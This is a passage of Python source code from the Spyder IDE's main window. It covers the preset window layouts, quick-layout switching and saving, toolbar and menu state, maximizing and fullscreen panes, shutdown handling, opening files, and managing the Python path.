[46, 54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [10, # Column 0 width
45, # Column 1 width
45], # Column 2 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45], # Column 1, row heights
[55, 45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [100], # Column 0 width
'height fraction': [[55, 45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[100], # Column 0, row heights
[100]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
# We use both directions to ensure proper update when moving from
# 'Horizontal Split' to 'Spyder Default'
# This also seems to help on random cases where the display seems
# 'empty'
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The defaults layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See spyder-ide/spyder#6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
action = plugin._toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if action:
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
if not self.completions.closing_plugin(cancelable):
return False
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.completions.shutdown()
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(
dockwidget.features()
| QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(
dockwidget.features()
| QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
except AttributeError:
# Old API
if plugin.isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
self.lock_interface_action.setIcon(
ima.icon('lock' if self.interface_locked else 'lock_open'))
self.lock_interface_action.setText(
_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars"))
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
plugin.dockwidget.remove_title_bar()
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
for toolbar in self.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
try:
# New API
if plugin.get_widget().isAncestorOf(focus_widget):
self.last_plugin = plugin
except Exception:
# Old API
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above "for" cycle.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
try:
# New API
self.setCentralWidget(self.last_plugin.get_widget())
except AttributeError:
# Old API
self.setCentralWidget(self.last_plugin)
self.last_plugin._ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
try:
# New API
self.last_plugin.get_widget().show()
self.last_plugin.change_visibility(True)
except AttributeError:
# Old API
self.last_plugin.show()
self.last_plugin._visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
try:
# New API
self.last_plugin.dockwidget.setWidget(
self.last_plugin.get_widget())
except AttributeError:
# Old API
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
try:
# New API
self.last_plugin.get_widget().is_maximized = False
except AttributeError:
# Old API
self.last_plugin._ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
try:
# New API
self.last_plugin.get_widget().get_focus_widget().setFocus()
except AttributeError:
# Old API
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See spyder-ide/spyder#4291.
self.setWindowFlags(self.windowFlags()
| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def show_about(self):
"""Show About Spyder dialog box"""
from spyder.widgets.about import AboutDialog
abt = AboutDialog(self)
abt.show()
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(self)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.show()
@Slot()
def report_issue(self):
"""Report a Spyder issue to github."""
from spyder.widgets.reporterror import SpyderErrorDialog
self._report_dlg = SpyderErrorDialog(self, is_report=True)
self._report_dlg.set_color_scheme(CONF.get('appearance', 'selected'))
self._report_dlg.show()
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this sigal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
@Slot()
def win_env(self):
"""Show Windows current user environment variables."""
self.dialog_manager.show(WinUserEnvDialog(self))
# --- Kite
def show_kite_installation(self):
"""Show installation dialog for Kite."""
self.completions.get_client('kite').show_installation_dialog()
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
